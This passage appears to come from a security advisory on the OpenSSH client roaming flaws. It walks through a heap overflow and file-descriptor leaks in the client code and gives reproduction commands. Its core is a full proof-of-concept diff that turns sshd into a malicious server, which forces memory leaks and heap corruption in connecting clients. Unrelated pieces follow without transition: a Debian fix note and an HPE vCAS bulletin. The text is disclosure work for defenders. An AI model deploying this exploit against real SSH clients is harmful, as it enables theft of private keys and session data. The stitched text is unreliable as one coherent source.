packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API) first calloc()ates setp, a file descriptor set for connection_in; next, it loops around memset(), FD_SET(), select() and roaming_read(); last, it free()s setp and returns. Unfortunately, roaming_read() may reassign a higher value to connection_in (if a reconnection occurs), but setp is never enlarged, and the following memset() and FD_SET() may therefore overflow setp (a heap-based buffer overflow):
1048 int 1049 packet_read_seqnr(u_int32_t seqnr_p) 1050 { .... 1052 fd_set setp; .... 1058 setp = (fd_set )xcalloc(howmany(active_state->connection_in + 1, 1059 NFDBITS), sizeof(fd_mask)); .... 1065 for (;;) { .... 1075 if (type != SSH_MSG_NONE) { 1076 free(setp); 1077 return type; 1078 } .... 1083 memset(setp, 0, howmany(active_state->connection_in + 1, 1084 NFDBITS) * sizeof(fd_mask)); 1085 FD_SET(active_state->connection_in, setp); .... 1092 for (;;) { .... 1097 if ((ret = select(active_state->connection_in + 1, setp, 1098 NULL, NULL, timeoutp)) >= 0) 1099 break; .... 1115 } .... 1117 do { .... 1119 len = roaming_read(active_state->connection_in, buf, 1120 sizeof(buf), &cont); 1121 } while (len == 0 && cont); .... 1130 } 1131 / NOTREACHED */ 1132 }
- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is basically similar to packet_read_seqnr() and may overflow its own setp if roaming_write() (called by packet_write_poll()) reassigns a higher value to connection_out (after a successful reconnection):
1739 void 1740 packet_write_wait(void) 1741 { 1742 fd_set setp; .... 1746 setp = (fd_set )xcalloc(howmany(active_state->connection_out + 1, 1747 NFDBITS), sizeof(fd_mask)); 1748 packet_write_poll(); 1749 while (packet_have_data_to_write()) { 1750 memset(setp, 0, howmany(active_state->connection_out + 1, 1751 NFDBITS) * sizeof(fd_mask)); 1752 FD_SET(active_state->connection_out, setp); .... 1758 for (;;) { .... 1763 if ((ret = select(active_state->connection_out + 1, 1764 NULL, setp, NULL, timeoutp)) >= 0) 1765 break; .... 1776 } .... 1782 packet_write_poll(); 1783 } 1784 free(setp); 1785 }
Mitigating Factors
This buffer overflow affects all OpenSSH clients >= 5.4, but its impact is significantly reduced by the Mitigating Factors detailed in the Information Leak section, and additionally:
- OpenSSH versions >= 6.8 reimplement packet_backup_state() and packet_restore_state(), but introduce a bug that prevents the buffer overflow from being exploited; indeed, ssh_packet_backup_state() swaps two local pointers, ssh and backup_state, instead of swapping the two global pointers active_state and backup_state:
9 struct ssh active_state, backup_state; ... 238 void 239 packet_backup_state(void) 240 { 241 ssh_packet_backup_state(active_state, backup_state); 242 } 243 244 void 245 packet_restore_state(void) 246 { 247 ssh_packet_restore_state(active_state, backup_state); 248 }
2269 void 2270 ssh_packet_backup_state(struct ssh ssh, 2271 struct ssh backup_state) 2272 { 2273 struct ssh tmp; .... 2279 if (backup_state) 2280 tmp = backup_state; 2281 else 2282 tmp = ssh_alloc_session_state(); 2283 backup_state = ssh; 2284 ssh = tmp; 2285 } .... 2291 void 2292 ssh_packet_restore_state(struct ssh ssh, 2293 struct ssh backup_state) 2294 { 2295 struct ssh tmp; .... 2299 tmp = backup_state; 2300 backup_state = ssh; 2301 ssh = tmp; 2302 ssh->state->connection_in = backup_state->state->connection_in;
As a result, the global pointer backup_state is still NULL when passed to ssh_packet_restore_state(), and crashes the OpenSSH client when dereferenced:
env ROAMING="overflow:A fd_leaks:0" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -o ProxyCommand="/usr/bin/nc -w 15 %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Segmentation fault (core dumped)
This bug prevents the buffer overflow from being exploited, but not the information leak, because the vulnerable function resend_bytes() is called before ssh_packet_restore_state() crashes.
File Descriptor Leak
A back-of-the-envelope calculation indicates that, in order to increase the file descriptor connection_in or connection_out, and thus overflow the file descriptor set setp in packet_read_seqnr() or packet_write_wait(), a file descriptor leak is needed:
-
First, the number of bytes calloc()ated for setp is rounded up to the nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors) on 64-bit systems.
-
Next, in glibc, this number is rounded up to the nearest multiple of MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit systems.
-
Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit systems, of which 24 bytes (or 192 file descriptors) are reserved for setp.
-
In conclusion, a file descriptor leak is needed, because connection_in or connection_out has to be increased by hundreds in order to overflow setp.
The search for a suitable file descriptor leak begins with a study of the behavior of the four ssh_connect() methods, when called for a reconnection by wait_for_roaming_reconnect():
- The default method ssh_connect_direct() communicates with the server through a simple TCP socket: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old TCP socket is close()d by packet_backup_state(), but immediately reused for the new TCP socket in ssh_connect_direct(): the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
The special ProxyCommand "-" communicates with the server through stdin and stdout, but (as explained in the Mitigating Factors of the Information Leak section) it cannot possibly reconnect to the server, and is therefore immune to this buffer overflow.
-
Surprisingly, we discovered a file descriptor leak in the ssh_proxy_fdpass_connect() method itself; indeed, the file descriptor sp[1] is never close()d:
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 106 int sp[2], sock; ... 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) < 0) 114 fatal("Could not create socketpair to communicate with " 115 "proxy dialer: %.100s", strerror(errno)); ... 161 close(sp[0]); ... 164 if ((sock = mm_receive_fd(sp[1])) == -1) 165 fatal("proxy dialer did not pass back a connection"); ... 171 / Set the connection file descriptors. / 172 packet_set_connection(sock, sock); 173 174 return 0; 175 }
However, two different reasons prevent this file descriptor leak from triggering the setp overflow:
- The method ssh_proxy_fdpass_connect() communicates with the server through a single socket received from the ProxyCommand: the two file descriptors connection_in and connection_out are both equal to this socket's file descriptor.
In wait_for_roaming_reconnect(), the low-numbered file descriptor of the old socket is close()d by packet_backup_state(), reused for sp[0] in ssh_proxy_fdpass_connect(), close()d again, and eventually reused again for the new socket: the new file descriptors connection_in and connection_out are equal to this old, low-numbered file descriptor, and cannot possibly overflow setp.
-
Because of the waitpid() bug described in the Mitigating Factors of the Information Leak section, the method ssh_proxy_fdpass_connect() calls fatal() before it returns to wait_for_roaming_reconnect(), and is therefore immune to this buffer overflow.
-
The method ssh_proxy_connect() communicates with the server through a ProxyCommand and two different pipes: the file descriptor connection_in is the read end of the second pipe (pout[0]), and the file descriptor connection_out is the write end of the first pipe (pin[1]):
180 static int 181 ssh_proxy_connect(const char host, u_short port, const char proxy_command) 182 { ... 184 int pin[2], pout[2]; ... 192 if (pipe(pin) < 0 || pipe(pout) < 0) 193 fatal("Could not create pipes to communicate with the proxy: %.100s", 194 strerror(errno)); ... 240 / Close child side of the descriptors. / 241 close(pin[0]); 242 close(pout[1]); ... 247 / Set the connection file descriptors. / 248 packet_set_connection(pout[0], pin[1]); 249 250 / Indicate OK return / 251 return 0; 252 }
In wait_for_roaming_reconnect(), the two old, low-numbered file descriptors connection_in and connection_out are both close()d by packet_backup_state(), and immediately reused for the pipe(pin) in ssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of these old, low-numbered file descriptors, and cannot possibly overflow setp.
On the other hand, the pipe(pout) in ssh_proxy_connect() may return high-numbered file descriptors, and the new connection_in (pout[0]) may therefore overflow setp, if hundreds of file descriptors were leaked before the call to wait_for_roaming_reconnect():
- We discovered a file descriptor leak in the pubkey_prepare() function of OpenSSH >= 6.8; indeed, if the client is running an authentication agent that does not offer any private keys, the reference to agent_fd is lost, and this file descriptor is never close()d:
1194 static void 1195 pubkey_prepare(Authctxt *authctxt) 1196 { .... 1200 int agent_fd, i, r, found; .... 1247 if ((r = ssh_get_authentication_socket(&agent_fd)) != 0) { 1248 if (r != SSH_ERR_AGENT_NOT_PRESENT) 1249 debug("%s: ssh_get_authentication_socket: %s", 1250 func, ssh_err(r)); 1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, &idlist)) != 0) { 1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES) 1253 debug("%s: ssh_fetch_identitylist: %s", 1254 func, ssh_err(r)); 1255 } else { .... 1288 authctxt->agent_fd = agent_fd; 1289 } .... 1299 }
However, OpenSSH clients >= 6.8 crash in ssh_packet_restore_state() (because of the NULL-pointer dereference discussed in the Mitigating Factors of the Buffer Overflow section) and are immune to the setp overflow, despite this agent_fd leak.
- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH client (it is disabled by default), a malicious SSH server can request hundreds of forwardings, in order to increase connection_in (each forwarding opens a file descriptor), and thus overflow setp in packet_read_seqnr():
env ROAMING="overflow:A" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed] *** Error in `/usr/bin/ssh': free(): invalid next size (fast): 0x00007f0474d03e70 *** Aborted (core dumped)
env ROAMING="overflow:X" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/ssh -X -o ProxyCommand="/usr/bin/socat - TCP4:%h:%p" -p 222 127.0.0.1
user@127.0.0.1's password:
[connection suspended, press return to resume][connection resumed]
*** Error in /usr/bin/ssh': free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***
*** Error in/usr/bin/ssh': malloc(): memory corruption: 0x00007fdcc2a3abc0 ***
Finally, a brief digression on two unexpected problems that had to be solved in our proof-of-concept:
-
First, setp can be overflowed only in packet_read_seqnr(), not in packet_write_wait(), but agent forwarding and X11 forwarding are post- authentication functionalities, and post-authentication calls to packet_read() or packet_read_expect() are scarce, except in the key-exchange code of OpenSSH clients < 6.8: our proof-of-concept effectively forces a rekeying in order to overflow setp in packet_read_seqnr().
-
Second, after a successful reconnection, packet_read_seqnr() may call fatal("Read from socket failed: %.100s", ...), because roaming_read() may return EAGAIN (EAGAIN is never returned without the reconnection, because the preceding call to select() guarantees that connection_in is ready for read()). Our proof-of-concept works around this problem by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server, allowing data to reach the client before roaming_read() is called, thus avoiding EAGAIN.
======================================================================== Acknowledgments ========================================================================
We would like to thank the OpenSSH developers for their great work and their incredibly quick response, Red Hat Product Security for promptly assigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall Project for the interesting discussions.
======================================================================== Proof Of Concept ========================================================================
diff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c --- openssh-6.4p1/auth2-pubkey.c 2013-07-17 23:10:10.000000000 -0700 +++ openssh-6.4p1+roaming/auth2-pubkey.c 2016-01-07 01:04:15.000000000 -0800 @@ -169,7 +169,9 @@ userauth_pubkey(Authctxt authctxt) * if a user is not allowed to login. is this an * issue? -markus / - if (PRIVSEP(user_key_allowed(authctxt->pw, key))) { + if (PRIVSEP(user_key_allowed(authctxt->pw, key)) || 1) { + debug("%s: force client-side load_identity_file", + func); packet_start(SSH2_MSG_USERAUTH_PK_OK); packet_put_string(pkalg, alen); packet_put_string(pkblob, blen); diff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c --- openssh-6.4p1/kex.c 2013-06-01 14:31:18.000000000 -0700 +++ openssh-6.4p1+roaming/kex.c 2016-01-07 01:04:15.000000000 -0800 @@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX], }
static void +roaming_reconnect(void) +{ + packet_read_expect(SSH2_MSG_KEX_ROAMING_RESUME); + const u_int id = packet_get_int(); / roaming_id / + debug("%s: id %u", func, id); + packet_check_eom(); + + const char const dir = get_roaming_dir(id); + debug("%s: dir %s", func, dir); + const int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, dir, errno); + if (fchdir(fd) != 0) + fatal("%s: fchdir %s errno %d", func, dir, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, dir, errno); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED); + packet_put_int64(arc4random()); / chall / + packet_put_int64(arc4random()); / oldchall / + packet_send(); + + packet_read_expect(SSH2_MSG_KEX_ROAMING_AUTH); + const u_int64_t client_read_bytes = packet_get_int64(); + debug("%s: client_read_bytes %llu", func, + (unsigned long long)client_read_bytes); + packet_get_int64(); / digest (1-8) / + packet_get_int64(); / digest (9-16) / + packet_get_int(); / digest (17-20) / + packet_check_eom(); + + u_int64_t client_write_bytes; + size_t len = sizeof(client_write_bytes); + load_roaming_file("client_write_bytes", &client_write_bytes, &len); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + + u_int client_out_buf_size; + len = sizeof(client_out_buf_size); + load_roaming_file("client_out_buf_size", &client_out_buf_size, &len); + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0 || client_out_buf_size > MAX_ROAMBUF) + fatal("%s: client_out_buf_size %u", func, + client_out_buf_size); + + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_OK); + packet_put_int64(client_write_bytes - (u_int64_t)client_out_buf_size); + packet_send(); + const int overflow = (access("output", F_OK) == 0); + if (overflow != 0) { + const void const ptr = load_roaming_file("output", NULL, &len); + buffer_append(packet_get_output(), ptr, len); + } + packet_write_wait(); + + char const client_out_buf = xmalloc(client_out_buf_size); + if (atomicio(read, packet_get_connection_in(), client_out_buf, + client_out_buf_size) != client_out_buf_size) + fatal("%s: read client_out_buf_size %u errno %d", func, + client_out_buf_size, errno); + if (overflow == 0) + dump_roaming_file("infoleak", client_out_buf, + client_out_buf_size); + fatal("%s: all done for %s", func, dir); +} + +static void kex_choose_conf(Kex kex) { Newkeys newkeys; @@ -470,6 +537,10 @@ kex_choose_conf(Kex kex) kex->roaming = 1; free(roaming); } + } else if (strcmp(peer[PROPOSAL_KEX_ALGS], KEX_RESUME) == 0) { + roaming_reconnect(); + / NOTREACHED / + fatal("%s: returned from %s", func, KEX_RESUME); }
/* Algorithm Negotiation */
diff -pruN openssh-6.4p1/roaming.h openssh-6.4p1+roaming/roaming.h --- openssh-6.4p1/roaming.h 2011-12-18 15:52:52.000000000 -0800 +++ openssh-6.4p1+roaming/roaming.h 2016-01-07 01:04:15.000000000 -0800 @@ -42,4 +42,86 @@ void resend_bytes(int, u_int64_t ); void calculate_new_key(u_int64_t , u_int64_t, u_int64_t); int resume_kex(void);
+#include +#include +#include +#include +#include +#include + +#include "atomicio.h" +#include "log.h" +#include "xmalloc.h" + +static inline char * +get_roaming_dir(const u_int id) +{ + const size_t buflen = MAXPATHLEN; + char const buf = xmalloc(buflen); + + if ((u_int)snprintf(buf, buflen, "/tmp/roaming-%08x", id) >= buflen) + fatal("%s: snprintf %u error", func, id); + return buf; +} + +static inline void +dump_roaming_file(const char const name, + const void const buf, const size_t buflen) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buf == NULL) + fatal("%s: %s buf %p", func, name, buf); + if (buflen <= 0 || buflen > MAX_ROAMBUF) + fatal("%s: %s buflen %lu", func, name, (u_long)buflen); + + const int fd = open(name, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + if (write(fd, buf, buflen) != (ssize_t)buflen) + fatal("%s: write %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); +} + +static inline void * +load_roaming_file(const char const name, + void buf, size_t const buflenp) +{ + if (name == NULL) + fatal("%s: name %p", func, name); + if (strchr(name, '/') != NULL) + fatal("%s: name %s", func, name); + if (buflenp == NULL) + fatal("%s: %s buflenp %p", func, name, buflenp); + + const int fd = open(name, O_RDONLY | O_NOFOLLOW | O_NONBLOCK); + if (fd <= -1) + fatal("%s: open %s errno %d", func, name, errno); + struct stat st; + if (fstat(fd, &st) != 0) + fatal("%s: fstat %s errno %d", func, name, errno); + if (S_ISREG(st.st_mode) == 0) + fatal("%s: %s mode 0%o", func, name, (u_int)st.st_mode); + if (st.st_size <= 0 || st.st_size > MAX_ROAMBUF) + fatal("%s: %s size %lld", func, name, + (long long)st.st_size); + + if (buf == NULL) { + buflenp = st.st_size; + buf = xmalloc(buflenp); + } else { + if (buflenp != (size_t)st.st_size) + fatal("%s: %s size %lld buflen %lu", func, name, + (long long)st.st_size, (u_long)buflenp); + } + if (read(fd, buf, buflenp) != (ssize_t)buflenp) + fatal("%s: read %s errno %d", func, name, errno); + if (close(fd) != 0) + fatal("%s: close %s errno %d", func, name, errno); + return buf; +} + #endif / ROAMING / diff -pruN openssh-6.4p1/serverloop.c openssh-6.4p1+roaming/serverloop.c --- openssh-6.4p1/serverloop.c 2013-07-17 23:12:45.000000000 -0700 +++ openssh-6.4p1+roaming/serverloop.c 2016-01-07 01:04:15.000000000 -0800 @@ -1060,6 +1060,9 @@ server_request_session(void) return c; }
+static int client_session_channel = -1; +static int server_session_channel = -1; + static void server_input_channel_open(int type, u_int32_t seq, void ctxt) { @@ -1089,12 +1092,22 @@ server_input_channel_open(int type, u_in c->remote_window = rwindow; c->remote_maxpacket = rmaxpack; if (c->type != SSH_CHANNEL_CONNECTING) { + debug("%s: avoid client-side buf_append", func); + / packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); packet_put_int(c->remote_id); packet_put_int(c->self); packet_put_int(c->local_window); packet_put_int(c->local_maxpacket); packet_send(); + */ + if (strcmp(ctype, "session") == 0) { + if (client_session_channel != -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + client_session_channel = c->remote_id; + server_session_channel = c->self; + } } } else { debug("server_input_channel_open: failure %s", ctype); @@ -1111,6 +1124,196 @@ server_input_channel_open(int type, u_in }
static void +roaming_disconnect(Kex const kex) +{ + const char cp, roaming = getenv("ROAMING"); + if (roaming == NULL) + roaming = "infoleak"; + int overflow = 0; + if ((cp = strstr(roaming, "overflow:")) != NULL) + overflow = cp[9]; + + const u_int client_recv_buf_size = packet_get_int(); + packet_check_eom(); + const u_int server_recv_buf_size = get_recv_buf_size(); + const u_int server_send_buf_size = get_snd_buf_size(); + debug("%s: client_recv_buf_size %u", func, client_recv_buf_size); + debug("%s: server_recv_buf_size %u", func, server_recv_buf_size); + debug("%s: server_send_buf_size %u", func, server_send_buf_size); + + u_int client_send_buf_size = 0; + if ((cp = strstr(roaming, "client_send_buf_size:")) != NULL) + client_send_buf_size = strtoul(cp + 21, NULL, 0); + else if (client_recv_buf_size == DEFAULT_ROAMBUF) + client_send_buf_size = DEFAULT_ROAMBUF; + else { + const u_int + max = MAX(client_recv_buf_size, server_recv_buf_size), + min = MIN(client_recv_buf_size, server_recv_buf_size); + if (min <= 0) + fatal("%s: min %u", func, min); + if (((u_int64_t)(max - min) * 1024) / min < 1) + client_send_buf_size = server_send_buf_size; + else + client_send_buf_size = client_recv_buf_size; + } + debug("%s: client_send_buf_size %u", func, client_send_buf_size); + if (client_send_buf_size <= 0) + fatal("%s: client_send_buf_size", func); + + u_int id = 0; + char dir = NULL; + for (;;) { + id = arc4random(); + debug("%s: id %u", func, id); + free(dir); + dir = get_roaming_dir(id); + if (mkdir(dir, S_IRWXU) == 0) + break; + if (errno != EEXIST) + fatal("%s: mkdir %s errno %d", func, dir, errno); + } + debug("%s: dir %s", func, dir); + if (chdir(dir) != 0) + fatal("%s: chdir %s errno %d", func, dir, errno); + + u_int client_out_buf_size = 0; + if ((cp = strstr(roaming, "client_out_buf_size:")) != NULL) + client_out_buf_size = strtoul(cp + 20, NULL, 0); + else if (overflow != 0) + client_out_buf_size = MAX_ROAMBUF; + else + client_out_buf_size = 1 + arc4random() % 4096; + debug("%s: client_out_buf_size %u", func, client_out_buf_size); + if (client_out_buf_size <= 0) + fatal("%s: client_out_buf_size", func); + dump_roaming_file("client_out_buf_size", &client_out_buf_size, + sizeof(client_out_buf_size)); + + if ((cp = strstr(roaming, "scp_mode")) != NULL) { + if (overflow != 0) + fatal("%s: scp_mode is incompatible with overflow %d", + func, overflow); + + u_int seconds_left_to_sleep = 3; + if ((cp = strstr(cp, "sleep:")) != NULL) + seconds_left_to_sleep = strtoul(cp + 6, NULL, 0); + debug("%s: sleep %u", func, seconds_left_to_sleep); + + if (client_session_channel == -1) + fatal("%s: client_session_channel %d", + func, client_session_channel); + + packet_start(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_put_int(client_session_channel); + packet_put_int(server_session_channel); + packet_put_int(0); / server window / + packet_put_int(0); / server maxpacket / + packet_send(); + + packet_start(SSH2_MSG_CHANNEL_DATA); + packet_put_int(client_session_channel); + packet_put_string("\0\n", 2); / response&source|sink&run_err / + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_REQUEST); + packet_get_int(); / server channel / + debug("%s: channel request %s", func, + packet_get_cstring(NULL)); + + while (seconds_left_to_sleep) + seconds_left_to_sleep = sleep(seconds_left_to_sleep); + } + + packet_start(SSH2_MSG_REQUEST_SUCCESS); + packet_put_int(id); / roaming_id / + packet_put_int64(arc4random()); / cookie / + packet_put_int64(0); / key1 / + packet_put_int64(0); / key2 / + packet_put_int(client_out_buf_size - client_send_buf_size); + packet_send(); + packet_write_wait(); + + if (overflow != 0) { + const u_int64_t full_client_out_buf = get_recv_bytes() + + client_out_buf_size; + + u_int fd_leaks = 4 * 8 * 8; / MIN_CHUNK_SIZE in bits / + if ((cp = strstr(roaming, "fd_leaks:")) != NULL) + fd_leaks = strtoul(cp + 9, NULL, 0); + debug("%s: fd_leaks %u", func, fd_leaks); + + while (fd_leaks--) { + packet_start(SSH2_MSG_CHANNEL_OPEN); + packet_put_cstring(overflow == 'X' ? "x11" : + "auth-agent@openssh.com"); / ctype / + packet_put_int(arc4random()); / server channel / + packet_put_int(arc4random()); / server window / + packet_put_int(arc4random()); / server maxpacket / + if (overflow == 'X') { + packet_put_cstring(""); / originator / + packet_put_int(arc4random()); / port / + } + packet_send(); + + packet_read_expect(SSH2_MSG_CHANNEL_OPEN_CONFIRMATION); + packet_get_int(); / server channel / + packet_get_int(); / client channel / + packet_get_int(); / client window / + packet_get_int(); / client maxpacket / + packet_check_eom(); + } + + while (get_recv_bytes() <= full_client_out_buf) { + packet_start(SSH2_MSG_GLOBAL_REQUEST); + packet_put_cstring(""); / rtype / + packet_put_char(1); / want_reply / + packet_send(); + + packet_read_expect(SSH2_MSG_REQUEST_FAILURE); + packet_check_eom(); + } + + if (kex == NULL) + fatal("%s: no kex, cannot rekey", func); + if (kex->flags & KEX_INIT_SENT) + fatal("%s: KEX_INIT_SENT already", func); + char const ptr = buffer_ptr(&kex->my); + const u_int len = buffer_len(&kex->my); + if (len <= 1+4) / first_kex_follows + reserved / + fatal("%s: kex len %u", func, len); + ptr[len - (1+4)] = 1; / first_kex_follows / + kex_send_kexinit(kex); + + u_int i; + packet_read_expect(SSH2_MSG_KEXINIT); + for (i = 0; i < KEX_COOKIE_LEN; i++) + packet_get_char(); + for (i = 0; i < PROPOSAL_MAX; i++) + free(packet_get_string(NULL)); + packet_get_char(); / first_kex_follows / + packet_get_int(); / reserved / + packet_check_eom(); + + char buf[81922]; / two packet_read_seqnr bufferfuls / + memset(buf, '\0', sizeof(buf)); + packet_start(SSH2_MSG_KEX_ROAMING_AUTH_FAIL); + packet_put_string(buf, sizeof(buf)); + packet_send(); + const Buffer const output = packet_get_output(); + dump_roaming_file("output", buffer_ptr(output), + buffer_len(output)); + } + + const u_int64_t client_write_bytes = get_recv_bytes(); + debug("%s: client_write_bytes %llu", func, + (unsigned long long)client_write_bytes); + dump_roaming_file("client_write_bytes", &client_write_bytes, + sizeof(client_write_bytes)); + fatal("%s: all done for %s", func, dir); +} + +static void server_input_global_request(int type, u_int32_t seq, void ctxt) { char rtype; @@ -1168,6 +1371,13 @@ server_input_global_request(int type, u_ } else if (strcmp(rtype, "no-more-sessions@openssh.com") == 0) { no_more_sessions = 1; success = 1; + } else if (strcmp(rtype, ROAMING_REQUEST) == 0) { + if (want_reply != 1) + fatal("%s: rtype %s want_reply %d", func, + rtype, want_reply); + roaming_disconnect(ctxt); + / NOTREACHED */ + fatal("%s: returned from %s", func, ROAMING_REQUEST); } if (want_reply) { packet_start(success ? diff -pruN openssh-6.4p1/sshd.c openssh-6.4p1+roaming/sshd.c --- openssh-6.4p1/sshd.c 2013-07-19 20:21:53.000000000 -0700 +++ openssh-6.4p1+roaming/sshd.c 2016-01-07 01:04:15.000000000 -0800 @@ -2432,6 +2432,8 @@ do_ssh2_kex(void) } if (options.kex_algorithms != NULL) myproposal[PROPOSAL_KEX_ALGS] = options.kex_algorithms; + else + myproposal[PROPOSAL_KEX_ALGS] = KEX_DEFAULT_KEX "," KEX_RESUME;
if (options.rekey_limit || options.rekey_interval)
packet_set_rekey_limits((u_int32_t)options.rekey_limit,
.
More details about identifying an attack and mitigations will be available in the Qualys Security Advisory.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u3.
For the stable distribution (jessie), these problems have been fixed in version 1:6.7p1-5+deb8u1.
For the testing distribution (stretch) and unstable distribution (sid), these problems will be fixed in a later version. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05247375
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05247375 Version: 1
HPSBGN03638 rev.1 - HPE Remote Device Access: Virtual Customer Access System (vCAS) using lighttpd and OpenSSH, Unauthorized Modification of Information, Remote Denial of Service (DoS), Remote Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-08-29 Last Updated: 2016-08-29
Potential Security Impact: Remote Denial of Service (DoS), Disclosure of Information, Unauthorized Modification Of Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in the lighttpd and OpenSSH version used in HPE Remote Device Access: Virtual Customer Access System (vCAS). These vulnerabilities could be exploited remotely resulting in unauthorized modification of information, denial of service (DoS), and disclosure of information.
References:
CVE-2015-3200 CVE-2016-0777 CVE-2016-0778 PSRT110211
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HPE Remote Device Access: Virtual Customer Access System (vCAS) - v15.07 (RDA 8.1) and earlier.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-3200
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CVE-2016-0777
6.5 CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CVE-2016-0778
9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following updates available to resolve the vulnerabilities in Remote Device Access: Virtual Customer Access System (vCAS)
vCAS 16.05 (RDA 8.7) kits - hp-rdacas-16.05-10482-vbox.ova and hp-rdacas-16.05-10482.ova.
The Oracle VirtualBox kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482-vbox.ova
The VMware ESX(i) and VMware Player kit is available at: https://h20529.www2.hpe.com/apt/hp-rdacas-16.05-10482.ova
HISTORY Version:1 (rev.1) - 29 August 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability for any HPE supported product: Web form: https://www.hpe.com/info/report-security-vulnerability Email: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
